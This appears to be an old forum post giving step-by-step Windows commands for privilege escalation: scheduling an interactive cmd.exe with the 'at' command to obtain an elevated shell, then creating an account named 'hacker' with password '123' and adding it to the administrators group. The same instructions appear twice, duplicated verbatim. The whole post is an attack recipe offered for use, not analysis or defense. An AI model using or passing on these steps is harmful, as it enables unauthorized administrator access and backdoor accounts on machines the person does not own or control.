07-11-2008, 02:01 AM
Start CMD then type the following
at 5:30 /interactive cmd.exe
The time i put above is suppose to be one minute ahead of what the clock in the lower right is when you look at it... So say if the clock is 12:15 then you would type "at 12:16 /interactive cmd.exe" get it? without quotes.
That's not the end a new windows should open (another cmd box) this new cmd will have admin privileges. Then you type this code to create a new account.
net user hacker 123 /add
^What the above code will do is create a new account named hacker with password 123^ as you can see where it says hacker thats the account name and 123 is password, everything is separated by spaces. But this account is not admin yet next you have to do this last command.
net localgroup administrators [user] /add
Where it says user, put the account name and don't put the [] in.
at 5:30 /interactive cmd.exe
The time i put above is suppose to be one minute ahead of what the clock in the lower right is when you look at it... So say if the clock is 12:15 then you would type "at 12:16 /interactive cmd.exe" get it? without quotes.
That's not the end a new windows should open (another cmd box) this new cmd will have admin privileges. Then you type this code to create a new account.
net user hacker 123 /add
^What the above code will do is create a new account named hacker with password 123^ as you can see where it says hacker thats the account name and 123 is password, everything is separated by spaces. But this account is not admin yet next you have to do this last command.
net localgroup administrators [user] /add
Where it says user, put the account name and don't put the [] in.